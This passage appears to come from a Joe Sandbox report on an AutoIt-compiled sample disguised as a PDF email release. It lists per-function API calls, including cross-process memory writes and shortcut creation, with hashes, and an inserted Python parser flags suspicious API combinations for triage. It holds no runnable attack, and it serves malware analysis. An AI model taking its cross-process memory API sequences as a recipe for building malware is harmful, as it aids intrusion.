                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 2683427295-24824748
                                                                                                          • Opcode ID: 1bda8dbccf7256d2aa01c396ed48b3cf37b31d1360702cd0b44820da3968e7be
                                                                                                          • Instruction ID: 5acc9250eb3430db6a5373f43d8d4bdc14ea7619b9f725b873ed2653c1e78dee
                                                                                                          • Opcode Fuzzy Hash: 1bda8dbccf7256d2aa01c396ed48b3cf37b31d1360702cd0b44820da3968e7be
                                                                                                          • Instruction Fuzzy Hash: 87A14AB1204305EFD300EF54C885EABB7E8FF89315F00491DF5559B1A2DBB5AA09CB62
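The blocks above are the per-function summaries the Joe Sandbox IDA plugin emits for the AutoIt runtime in this sample: an API list with call sites, the strings the function references, and the Opcode ID / Instruction Fuzzy Hash pair that identifies the function across reports. Added example, not part of this report or of Joe Sandbox's own tooling: a Python parser for that block format, fed two blocks copied from this section (trimmed of most 'Associated:' dump lines), which turns each block into a record and flags API combinations an analyst would look at first, namely the TokenIntegrityLevel query at 007A8121 and the CoCreateInstance function that references ".lnk". The rule names and the 8-hex-digit function key are this example's own conventions.

```python
"""Parse the per-function 'IDA Plugin' summaries of a Joe Sandbox report
(blocks headed 'APIs' ... 'Instruction Fuzzy Hash') into records and flag
API combinations worth a first look. Example code, not Joe Sandbox's."""
import re
from dataclasses import dataclass, field

# Constructed input: two function blocks copied from this report, trimmed
# (most 'Associated:' dump lines and the surrounding indentation removed).
SAMPLE = """\
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007A8121
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007A812B
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A813A
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8141
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8157
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 5d4b9ec31aa8de7e9cceaf0f29e765d6a06d51787b357b5ca3da98e85298f33c
• Instruction Fuzzy Hash: E9F06271301308AFEB511FA5EC88E673BBCFF8A754B04413AF986C7150DB699D41DA62
APIs
• CoInitialize.OLE32(00000000), ref: 007BC432
• CoCreateInstance.OLE32(007E2D6C,00000000,00000001,007E2BDC,?), ref: 007BC44A
  • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
• CoUninitialize.OLE32 ref: 007BC6B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Similarity
• API ID: CreateInitializeInstanceUninitialize_memmove
• String ID: .lnk
• API String ID: 2683427295-24824748
• Opcode ID: 1bda8dbccf7256d2aa01c396ed48b3cf37b31d1360702cd0b44820da3968e7be
• Instruction Fuzzy Hash: 87A14AB1204305EFD300EF54C885EABB7E8FF89315F00491DF5559B1A2DBB5AA09CB62
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# One API line: optional subcall prefix, Name.MODULE, optional (args), 'ref: ADDR'.
API_RE = re.compile(r"^•\s+(?P<sub>Part of subcall function [0-9A-F]+: )?"
                    r"(?P<name>[\w:@]+)\.(?P<module>[A-Z0-9]+)"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
STRING_RE = re.compile(r"^•\s+(?P<value>.*), xrefs: (?P<ref>[0-9A-F]+)$")
META_RE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    subcall: bool  # reported as 'Part of subcall function', not a direct call

@dataclass
class Function:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    @property
    def api_names(self):
        return {c.name for c in self.apis if not c.subcall}

    @property
    def key(self):
        # Opcode ID is the report's stable per-function identifier; 8 hex digits name it in output.
        return self.meta.get("Opcode ID", "?")[:8]

def parse_report(text):
    functions, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            if section == "APIs":  # every function block opens with 'APIs'
                current = Function()
                functions.append(current)
            continue
        if current is None or not line:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            current.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], bool(m["sub"])))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            current.strings.append((m["value"], m["ref"]))
        elif m := META_RE.match(line):
            current.meta[m["key"]] = m["value"]
    return functions

# Triage rules (this example's own labels): API sets that deserve a first look.
RULES = {
    "token-integrity-check": lambda f: "GetTokenInformation" in f.api_names
        and any("TokenIntegrityLevel" in c.args for c in f.apis),
    "shell-link-creation": lambda f: "CoCreateInstance" in f.api_names
        and (f.meta.get("String ID") == ".lnk" or any(v.endswith(".lnk") for v, _ in f.strings)),
    "timed-sleep": lambda f: {"QueryPerformanceCounter", "Sleep"} <= f.api_names,
}

def triage(functions):
    """Map each rule name to the keys of the functions it matches."""
    return {name: [f.key for f in functions if rule(f)] for name, rule in RULES.items()}

if __name__ == "__main__":
    funcs = parse_report(SAMPLE)
    for f in funcs:
        print(f.key, sorted(f.api_names), f.meta.get("API String ID"))
    print(triage(funcs))
```

Run against the full report text (copy the IDA plugin section into a file and pass it to parse_report) to get one record per function; comparing the Opcode ID and Instruction Fuzzy Hash fields of two reports is a quick way to see which runtime functions two AutoIt-compiled samples share.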
                                                                                                          APIs
                                                                                                            • Part of subcall function 00770DB6: std::exception::exception.LIBCMT ref: 00770DEC
                                                                                                            • Part of subcall function 00770DB6: __CxxThrowException@8.LIBCMT ref: 00770E01
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                            • Part of subcall function 00757A51: _memmove.LIBCMT ref: 00757AAB
                                                                                                          • __swprintf.LIBCMT ref: 00762ECD
                                                                                                          Strings
                                                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00762D66
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                          • API String ID: 1943609520-557222456
                                                                                                          • Opcode ID: 1331ef6ec5fcaf8a2aff4c8af308612db0a172e10ac8373c3bdf435ae69db26e
                                                                                                          • Instruction ID: 1f190fb8e86c80d1f9d0aa9b3c50d7a3ba683901f5495feccf759b5297c25c27
                                                                                                          • Opcode Fuzzy Hash: 1331ef6ec5fcaf8a2aff4c8af308612db0a172e10ac8373c3bdf435ae69db26e
                                                                                                          • Instruction Fuzzy Hash: C4918F71108601DFCB14EF24D899CAEB7A8EF85710F14491DF8469B2A2EB78ED49CB52
                                                                                                          APIs
                                                                                                            • Part of subcall function 00754750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00754743,?,?,007537AE,?), ref: 00754770
                                                                                                          • CoInitialize.OLE32(00000000), ref: 007BB9BB
                                                                                                          • CoCreateInstance.OLE32(007E2D6C,00000000,00000001,007E2BDC,?), ref: 007BB9D4
                                                                                                          • CoUninitialize.OLE32 ref: 007BB9F1
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 2126378814-24824748
                                                                                                          • Opcode ID: 10dd4355236629a07a439c4ad01be4a1adcd3f835efbdfeed06002f9c21a1689
                                                                                                          • Instruction ID: 97da367cccbc6bd936251c93d46dbf78a10f5cc34ba2ffa697b10d76928bd94b
                                                                                                          • Opcode Fuzzy Hash: 10dd4355236629a07a439c4ad01be4a1adcd3f835efbdfeed06002f9c21a1689
                                                                                                          • Instruction Fuzzy Hash: 2FA13475604205DFC704DF14C884E9ABBE5FF89324F148998F8999B3A2CB79EC49CB91
                                                                                                          APIs
                                                                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 007AB4BE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContainedObject
                                                                                                          • String ID: AutoIt3GUI$Container$%~
                                                                                                          • API String ID: 3565006973-1172083821
                                                                                                          • Opcode ID: 05e656a254a56ebf73f63c0beae984dac9da80ca1476534207a1aca68c8956dd
                                                                                                          • Instruction ID: 70846d1f473aff1a8aca2f28f917b769b088f3e13b10df90578497988fb87205
                                                                                                          • Opcode Fuzzy Hash: 05e656a254a56ebf73f63c0beae984dac9da80ca1476534207a1aca68c8956dd
                                                                                                          • Instruction Fuzzy Hash: 39916A70600601EFDB54DF64C884B6AB7E9FF8A710F24866DF94ACB292DB75E841CB50
                                                                                                          APIs
                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 007750AD
                                                                                                            • Part of subcall function 007800F0: __87except.LIBCMT ref: 0078012B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorHandling__87except__start
                                                                                                          • String ID: pow
                                                                                                          • API String ID: 2905807303-2276729525
                                                                                                          • Opcode ID: 3311c3a67ab32c48d2443aa26cb6fd7f9e61d51b296d5a0aba26795f2eb62de6
                                                                                                          • Instruction ID: a8a57241fdc43b3d30aec891210cb49e6d8d9806fade7584efe2cedef994c139
                                                                                                          • Opcode Fuzzy Hash: 3311c3a67ab32c48d2443aa26cb6fd7f9e61d51b296d5a0aba26795f2eb62de6
                                                                                                          • Instruction Fuzzy Hash: DB517A20E4860586DF517738C84937E2B98AB01790F30CD58E4D98A2A9EFBC89D8D7C6
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: 3cv$_v
                                                                                                          • API String ID: 4104443479-436345795
                                                                                                          • Opcode ID: 799ca8de52e4810b47bd6843e25872e920e491a710f750e9132af61fe31766db
                                                                                                          • Instruction ID: f7e7e65b215b5cf2830afca0e9188c037480f0487739463634e11989822159d6
                                                                                                          • Opcode Fuzzy Hash: 799ca8de52e4810b47bd6843e25872e920e491a710f750e9132af61fe31766db
                                                                                                          • Instruction Fuzzy Hash: 3A515C70A00609DFCF64CF68D884AAEBBF1FF45304F248529E85AD7250EB39E965CB51
                                                                                                          APIs
                                                                                                            • Part of subcall function 00754F0B: __fread_nolock.LIBCMT ref: 00754F29
                                                                                                          • _wcscmp.LIBCMT ref: 007B9824
                                                                                                          • _wcscmp.LIBCMT ref: 007B9837
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscmp$__fread_nolock
                                                                                                          • String ID: FILE$
                                                                                                          • API String ID: 4029003684-3276627178
                                                                                                          • Opcode ID: d057d10b162de9cf4a5b48dee0e6a804a96c2782cc8140f576c2524e0347e5cb
                                                                                                          • Instruction ID: 89775a842663e47641bdae385227a86e7e8377173056c2ed2c6ca305e3879256
                                                                                                          • Opcode Fuzzy Hash: d057d10b162de9cf4a5b48dee0e6a804a96c2782cc8140f576c2524e0347e5cb
                                                                                                          • Instruction Fuzzy Hash: 8D41C531A00209FADF209BA4CC4DFEFBBB9DF85714F004069FA15E7181DA79A9448B61
                                                                                                          APIs
                                                                                                            • Part of subcall function 007B14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007A9296,?,?,00000034,00000800,?,00000034), ref: 007B14E6
                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007A983F
                                                                                                            • Part of subcall function 007B1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007A92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 007B14B1
                                                                                                            • Part of subcall function 007B13DE: GetWindowThreadProcessId.USER32(?,?), ref: 007B1409
                                                                                                            • Part of subcall function 007B13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007A925A,00000034,?,?,00001004,00000000,00000000), ref: 007B1419
                                                                                                            • Part of subcall function 007B13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007A925A,00000034,?,?,00001004,00000000,00000000), ref: 007B142F
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007A98AC
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007A98F9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                          • String ID: @
                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                          • Opcode ID: cf82d23fe1b2bcf3963358c238533f6598983d26e91a8a90216c6756c89e2ccc
                                                                                                          • Instruction ID: b959d7b0a87861b903c6c0cf8a2ed5620859825c6be7b398b430a9df101957ea
                                                                                                          • Opcode Fuzzy Hash: cf82d23fe1b2bcf3963358c238533f6598983d26e91a8a90216c6756c89e2ccc
                                                                                                          • Instruction Fuzzy Hash: C9415C7690121CBFCB10DFA4CC95BDEBBB8EB4A300F404199FA45B7181DA746E45CBA0
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007DF910,00000000,?,?,?,?), ref: 007D79DF
                                                                                                          • GetWindowLongW.USER32 ref: 007D79FC
                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007D7A0C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long
                                                                                                          • String ID: SysTreeView32
                                                                                                          • API String ID: 847901565-1698111956
                                                                                                          • Opcode ID: 7beec37974affe147c87d1051c0462dbf27b6aadac1b34cb548cbd592956bde0
                                                                                                          • Instruction ID: 79b2159fd0774ee2c72dbaba93ac2ee8b8b8216898f820e4fd29e6555669b847
                                                                                                          • Opcode Fuzzy Hash: 7beec37974affe147c87d1051c0462dbf27b6aadac1b34cb548cbd592956bde0
                                                                                                          • Instruction Fuzzy Hash: 3131CE32204606ABDB158E38CC45BEA77B9EB45324F248726F875922E0E739E951CB50
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007D7461
                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007D7475
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 007D7499
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window
                                                                                                          • String ID: SysMonthCal32
                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                          • Opcode ID: 5d4467e6b38bb9e98c3cfdb6ec771a9bd64625e48a61da024ba5f4f8182a6dcb
                                                                                                          • Instruction ID: c5bed9acdb051a1c41631bdbc611d10720021a46cd441dee4ef9ef94c7868d60
                                                                                                          • Opcode Fuzzy Hash: 5d4467e6b38bb9e98c3cfdb6ec771a9bd64625e48a61da024ba5f4f8182a6dcb
                                                                                                          • Instruction Fuzzy Hash: 1521B132500258ABDF168E94CC46FEA3B79EF48724F110115FE556B2D0DAB9AC50CBA0
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007D7C4A
                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007D7C58
                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007D7C5F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                          • String ID: msctls_updown32
                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                          • Opcode ID: 3373a9bf2e0b03ab81c35de9f4ef75f2addd2b2430354fcba1431d1efb300cf5
                                                                                                          • Instruction ID: f7aac1555895d5d95fb5844a2738a74f2137a37422967332aade7a81e1fb64f7
                                                                                                          • Opcode Fuzzy Hash: 3373a9bf2e0b03ab81c35de9f4ef75f2addd2b2430354fcba1431d1efb300cf5
                                                                                                          • Instruction Fuzzy Hash: 9F216BB1204208AFDB15DF28DCC5DA737BCEF4A3A4B54405AFA059B3A1DB75EC11CA60
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007D6D3B
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007D6D4B
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007D6D70
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: a8308693b342243776547af6c577912fa35c598eb9895170090eee42dc1d2855
• Instruction ID: aa1ecb8cfa756d8f82276aaf82b594b62a1a5c1d7d2f6c3d8183296bb8331afe
• Opcode Fuzzy Hash: a8308693b342243776547af6c577912fa35c598eb9895170090eee42dc1d2855
• Instruction Fuzzy Hash: 4F21B032711118BFDF118F54DC45EAB3BBAEF89760F018125F9459B2A0C675AC518BA0
APIs
• __snwprintf.LIBCMT ref: 007C3A66
  • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: __snwprintf_memmove
• String ID: , $$AUTOITCALLVARIABLE%d$%~
• API String ID: 3506404897-1730846867
• Opcode ID: 7d8c627e119488b0c3d0a468e63672e646ff86f64cf6f85a0d5ce2d34f3fefdc
• Instruction ID: 9e647406853df8b564efae913e93d1f9c0d8be275e0e4df7d4a967fc73d1e3c5
• Opcode Fuzzy Hash: 7d8c627e119488b0c3d0a468e63672e646ff86f64cf6f85a0d5ce2d34f3fefdc
• Instruction Fuzzy Hash: 33217C31600219EACF14EF64CC86EAE77B9AF44300F008459F955AB282DA78AA55CBA1
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007D7772
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007D7787
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007D7794
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
